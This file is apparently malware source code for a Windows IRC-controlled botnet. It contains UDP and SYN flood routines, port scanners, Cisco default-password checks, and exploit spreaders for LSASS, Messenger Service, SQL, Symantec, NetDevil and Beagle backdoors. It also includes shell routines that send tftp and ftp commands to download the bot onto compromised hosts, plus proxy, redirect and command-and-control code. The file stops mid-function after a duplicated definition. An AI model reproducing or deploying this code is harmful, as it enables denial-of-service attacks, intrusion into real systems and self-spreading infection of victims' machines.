// function for sending udp packets
DWORD WINAPI udp(LPVOID param)
{
PINGFLOOD udp = *((PINGFLOOD *)param);
PINGFLOOD *udps = (PINGFLOOD *)param;
udps->gotinfo = TRUE;
char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
int i;
srand(GetTickCount());
SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(udp.host);
LPHOSTENT hostent = NULL;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(udp.host);
if (hostent == NULL && iaddr.s_addr == INADDR_NONE) {
sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(1);
}
ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr));
ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port)));
if (udp.port < 1)
udp.port = 1;
if (udp.port > MAXUDPPORT)
udp.port = MAXUDPPORT;
udp.num = udp.num / 10;
if (udp.delay == 0)
udp.delay = 1;
for (i = 0; i < udp.size; i++)
pbuff[i] = (char)(rand() % 255);
while (udp.num-- > 0) {
//change port every 10 packets (if one isn't specified)
for (i = 0; i < 11; i++) {
fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin));
Sleep(udp.delay);
}
if (udp.port == 0)
ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1));
}
sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(0);
}
long SkySynSend(unsigned long TargetIP, unsigned short TargetPort, int len)
{
int skydelay = 100;
SOCKADDR_IN SockAddr;
SOCKET sock[SKYSYN_SOCKETS];
IN_ADDR iaddr;
memset(&SockAddr, 0, sizeof(SockAddr));
SockAddr.sin_family = AF_INET;
SockAddr.sin_port = fhtons(TargetPort);
LPHOSTENT lpHostEntry = NULL;
DWORD mode = 1;
int c,i;
iaddr.s_addr = TargetIP;
SockAddr.sin_addr = iaddr; //ip addy
i = 0;
while (i < len) {
for (c=0;c<SKYSYN_SOCKETS;c++)
{
sock[c] = socket(AF_INET, SOCK_STREAM, 0);
if (sock[c] == INVALID_SOCKET)
continue;
ioctlsocket(sock[c],FIONBIO,&mode);
}
for (c=0;c<SKYSYN_SOCKETS;c++)
connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
Sleep(skydelay);
for (c=0;c<SKYSYN_SOCKETS;c++)
closesocket(sock[c]); //close sockets
i++;
}
return 0;
}
BOOL CiscoHTTP(EXINFO exinfo)
{
int ret,SocketFD;
char buffer[4096];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
return FALSE;
memset(buffer, 0, sizeof(buffer));
if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
return FALSE;
fclosesocket(SocketFD);
if(ret < 5)
return FALSE;
if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
return FALSE;
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
unsigned long GetSpeed(char *szHost) {
if(strlen(szHost) > MAXHOSTNAME) return 0;
unsigned long lBufSize=NUM_KILOBYTES*1024;
SOCKET sSock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
if ((ssin.sin_addr.s_addr = ResolveAddress(szHost)) == 0) return 0;
ssin.sin_port = fhtons(80);
if ((sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return 0;
char *szBuf=new char[lBufSize+3];
srand(GetTickCount());
int iChar=(char)(rand() % 255);
memset(szBuf, 0, lBufSize+1 );
memset(szBuf, iChar, lBufSize );
unsigned long lStrLen=strlen(szBuf);
char *szPostReq=new char[lBufSize+1002];
sprintf(szPostReq, "POST / HTTP/1.0\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"\r\n",
szHost, lStrLen);
strcat(szPostReq, szBuf);
strcat(szPostReq, "\r\n");
lStrLen=strlen(szPostReq);
unsigned long lStartMS=GetTickCount();
for(unsigned long l=0; l<lStrLen; l+=1024) {
if(lStrLen-l < 1024) {
if(fsend(sSock, szPostReq+l, lStrLen-l,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
} else {
if(fsend(sSock, szPostReq+l, 1024,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
}
}
unsigned long lEndMS=GetTickCount();
float fElapsedS=(float)(lEndMS-lStartMS)/1000.0f;
if(fElapsedS==0.0f) fElapsedS=1.0f;
float fBytesPS=(float)lStrLen/fElapsedS;
float fKBytesPS=fBytesPS/1024.0f;
float fBitsPS=fBytesPS*8.0f;
float fKBitsPS=fBitsPS/1024.0f;
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return (unsigned long)fKBitsPS;
}
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
{
SOCKADDR_IN sin;
unsigned long blockcmd=1;
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
if (sock == INVALID_SOCKET)
return FALSE;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = ip;
sin.sin_port = fhtons((unsigned short)port);
fioctlsocket(sock,FIONBIO,&blockcmd);
fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
TIMEVAL timeout;
timeout.tv_sec=delay;
timeout.tv_usec=0;
FD_SET rset;
FD_ZERO(&rset);
FD_SET(sock,&rset);
int i = fselect(0,0,&rset,0,&timeout);
fclosesocket(sock);
if (i<=0)
return FALSE;
else
return TRUE;
}
// checks ip for open port
DWORD WINAPI ScanConnectThread(LPVOID param)
{
static char sendbuf[IRCLINE];
SCAN scan = *((SCAN *)param);
SCAN *scans = (SCAN *)param;
scans->cgotinfo = TRUE;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)scan.port);
ssin.sin_addr = scan.addy;
SOCKET sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock != INVALID_SOCKET) {
DWORD err = fconnect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN));
threads[scan.threadnum].sock = sock;
if (err != SOCKET_ERROR) {
sprintf(sendbuf,"nz m (portscan.p l g) »» IP: %s Port: %d is open.", finet_ntoa(scan.addy), scan.port);
irc_privmsg(scan.sock, scan.chan, sendbuf, scan.notice);
addlog(sendbuf);
}
}
fclosesocket(sock);
return 0;
}
BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
unsigned int sock,rc;
struct sockaddr_in sqludp;
if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
return FALSE;
sqludp.sin_family=AF_INET;
sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
sqludp.sin_port=fhtons(exinfo.port);
if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
{
if(rc==0)
{
fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
Sleep(1000);
if (ConnectShell(exinfo, 31337))
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
fshutdown(sock,1);
fclosesocket(sock);
return FALSE;
}
BOOL Cisco(EXINFO exinfo)
{
int ret,SocketFD;
char buffer1[64],buffer2[64];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
memset(buffer1, '\0', 64);
memset(buffer2, '\0', 64);
if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0)
{
ret = frecv(SocketFD, buffer1, 64, 0);
fsend(SocketFD,"cisco\r",6,0);
ret = frecv(SocketFD, buffer2, 64, 0);
if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
{
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
}
}
return FALSE;
}
SOCKET CreateSock(char *host, unsigned short port)
{
SOCKET ssock;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return INVALID_SOCKET;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(port);
IN_ADDR in;
in.s_addr = finet_addr(host);
LPHOSTENT Hostent = NULL;
if (in.s_addr == INADDR_NONE)
Hostent = fgethostbyname(host); //hostname
if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns
return INVALID_SOCKET;
ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));
if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
return INVALID_SOCKET;
}
return (ssock);
}
BOOL Symantec(EXINFO exinfo)
{
SOCKET sock;
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = finet_addr(exinfo.ip);
server.sin_port = fhtons((unsigned short)exinfo.port);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
return FALSE;
}
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) {
closesocket(sock);
return FALSE;
}
if (send(sock, ShellCode, sizeof(ShellCode), 0) == SOCKET_ERROR) {
closesocket(sock);
return FALSE;
}
closesocket(sock);
if (BuZShell(exinfo,8555)) {
exploit[exinfo.exploit].stats++;
return true;
}
return TRUE;
}
bool ConnectShell(EXINFO exinfo) {
int len;
struct sockaddr_in shell_addr;
char recvbuf[1024];
SOCKET sockfd;
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons((unsigned short)exinfo.port);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 )
return false;
if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1)
return false;
char mkdir_buff[400]="";
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\n"
"%s\n",
GetIP(exinfo.sock),filename, filename);
if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1)
return false;
return true;
}
BOOL lsass(EXINFO exinfo)
{
int len;
SOCKET sockfd;
int dport = 44444;
struct sockaddr_in their_addr;
char recvbuf[1600];
{
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
/* ^ Server's address */
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/* connect to the server */
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
switch (recvbuf[68]) {
case '1': // win XP
if (!Exploit2( exinfo, sockfd, 0 ))
return FALSE;
break;
case '0': //win 2k
if (!Exploit2( exinfo, sockfd, 2 ))
if (!Exploit2( exinfo, sockfd, 1))
return FALSE;
break;
default:
return FALSE;
}
}
return TRUE;
}
BOOL MessengerService(EXINFO exinfo)
{
int sockUDP,ver,packetsz;
unsigned char packet[8192];
struct sockaddr_in targetUDP;
struct
{
char os[30];
DWORD SEH;
DWORD JMP;
} targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
{
"Windows XP SP 1 (en)",
0x77ed73b4,
0x7804bf52 //rpcrt4.dll call [edi+6c]
}
};
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
if (TargetOS == OS_WIN2K) ver = 0;
if (TargetOS == OS_WINXP) ver = 1;
ZeroMemory(&targetUDP, sizeof(targetUDP));
targetUDP.sin_family = AF_INET;
targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
targetUDP.sin_port = fhtons(exinfo.port);
packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);
if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
{
return FALSE;
}
if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
{
return FALSE;
}
fclosesocket(sockUDP);
Sleep(500);
if (ConnectShellEx(exinfo, 9191) == true) {
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
DWORD WINAPI IdentThread(LPVOID param)
{
char user[12], buffer[IRCLINE];
int threadnum = (int)param;
BOOL success = FALSE;
SOCKET ssock,csock;
SOCKADDR_IN ssin, csin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)113);
ssin.sin_addr.s_addr=INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
threads[threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if (flisten(ssock, 5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
break;
sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
Split(buffer,0);
memset(user, 0, sizeof(user));
_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
success = TRUE;
}
}
}
}
}
if (!success) {
sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
addlog(buffer);
}
fclosesocket(ssock);
fclosesocket(csock);
clearthread(threadnum);
ExitThread(0);
}
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(bindport);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s &%s\r\n",
GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
DWORD WINAPI Socks4Thread(LPVOID param)
{
char sendbuf[IRCLINE];
SOCKADDR_IN ssin, csin;
SOCKET ssock, csock;
DWORD lpThreadId;
int csin_len = sizeof(csin);
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->gotinfo = TRUE;
memset(&ssin,0,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)socks4.port);
ssin.sin_addr.s_addr = INADDR_ANY;
ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
threads[socks4.threadnum].sock=ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, 10) == 0) {
sprintf(sendbuf, "[SOCKS4]: Server started on: %s:%d.", GetIP(socks4.sock), socks4.port);
if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
addlog(sendbuf);
while (1) {
csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len);
socks4.cgotinfo = FALSE;
sprintf(sendbuf,"[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, socks4.threadnum);
socks4.cthreadnum = addthread(sendbuf,SOCKS4_THREAD,csock);
threads[socks4.cthreadnum].parent = socks4.threadnum;
if (threads[socks4.cthreadnum].tHandle = CreateThread(NULL, 0, &Socks4ClientThread, (LPVOID)&socks4, 0, &lpThreadId)) {
while (socks4.cgotinfo == FALSE)
Sleep(5);
} else
sprintf(sendbuf, "[SOCKS4]: Failed to start client thread, error: <%d>.", GetLastError());
addlog(sendbuf);
}
}
}
fclosesocket(ssock);
sprintf(sendbuf, "[SOCKS4]: Failed to start server on Port %d.", socks4.port);
if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
addlog(sendbuf);
clearthread(socks4.threadnum);
ExitThread(0);
}
DWORD WINAPI IRC_Connect(LPVOID param)
{
IRC irc = *((IRC *)param);
IRC *ircs = (IRC *)param;
ircs->gotinfo = TRUE;
int rval = 0;
SOCKADDR_IN ssin;
while (1) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(irc.port);
if ((ssin.sin_addr.s_addr=ResolveAddress(irc.host)) == 0)
break;
memset(threads[irc.threadnum].nick, 0, sizeof(threads[irc.threadnum].nick));
rndnick(threads[irc.threadnum].nick, nicktype, nickprefix);
if ((threads[irc.threadnum].sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
Sleep(5000);
continue;
}
if (fconnect(threads[irc.threadnum].sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(threads[irc.threadnum].sock);
FlushDNSCache();
Sleep(5000);
continue;
}
#ifdef DEBUG_CONSOLE
printf("Bot started and connect to %s.\n", irc.host);
#endif
addlogv("[MAIN]: Connected to %s.", irc.host);
rval = IRC_ReceiveLoop(threads[irc.threadnum].sock, irc.host, irc.channel, irc.chanpass, threads[irc.threadnum].nick, irc.clone);
fclosesocket(threads[irc.threadnum].sock);
if (rval == 0)
continue;
else if (rval == 1) {
Sleep(900000);
continue;
}
else if (rval == 2)
break;
}
clearthread(irc.threadnum);
return rval;
}
// port redirect function
DWORD WINAPI RedirectThread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->gotinfo = TRUE;
char sendbuf[IRCLINE];
DWORD id;
SOCKADDR_IN rsin, csin;
memset(&rsin, 0, sizeof(rsin));
rsin.sin_family = AF_INET;
rsin.sin_port = fhtons(redirect.lport);
rsin.sin_addr.s_addr = INADDR_ANY;
int csin_len = sizeof(csin);
SOCKET rsock, csock;
if ((rsock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[redirect.threadnum].sock = rsock;
fWSAAsyncSelect(rsock, 0, WM_USER + 1, FD_READ);
if (fbind(rsock, (LPSOCKADDR)&rsin, sizeof(rsin)) == 0) {
if (flisten(rsock, 10) == 0) {
while(1) {
if ((csock = faccept(rsock, (LPSOCKADDR)&csin, &csin_len)) != INVALID_SOCKET) {
redirect.csock = csock;
redirect.gotinfo = FALSE;
sprintf(sendbuf,"[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, redirect.threadnum);
redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,csock);
threads[redirect.cthreadnum].parent = redirect.threadnum;
if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoopThread,(LPVOID)&redirect,0,&id)) {
while (redirect.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[REDIRECT]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
fclosesocket(csock);
fclosesocket(rsock);
clearthread(redirect.threadnum);
ExitThread(0);
}
int check_os(char *host,unsigned short target_port, int *sp)
{
SOCKET sSock;
if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(host);
ssin.sin_port = fhtons((unsigned short)target_port);
if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
char recv_buff[5000];
memset(recv_buff,0,sizeof(recv_buff));
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
fclosesocket(sSock);
*sp=atoi(&recv_buff[37]);
if (recv_buff[8] == 5 && recv_buff[12] == 0)
return ID_WIN2K;
else if (recv_buff[8] == 5 && recv_buff[12] == 1)
return ID_WINXP;
else if (recv_buff[8] == 5 && recv_buff[12] == 2)
return ID_WIN2K3;
else if (recv_buff[8] == 4)
return ID_WINNT;
else
return ID_UNKNOWN;
}
}
}
}
}
fclosesocket(sSock);
}
return 1;
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons(xport);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(exinfo.sock),FTP_PORT, filename, filename);
#endif
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
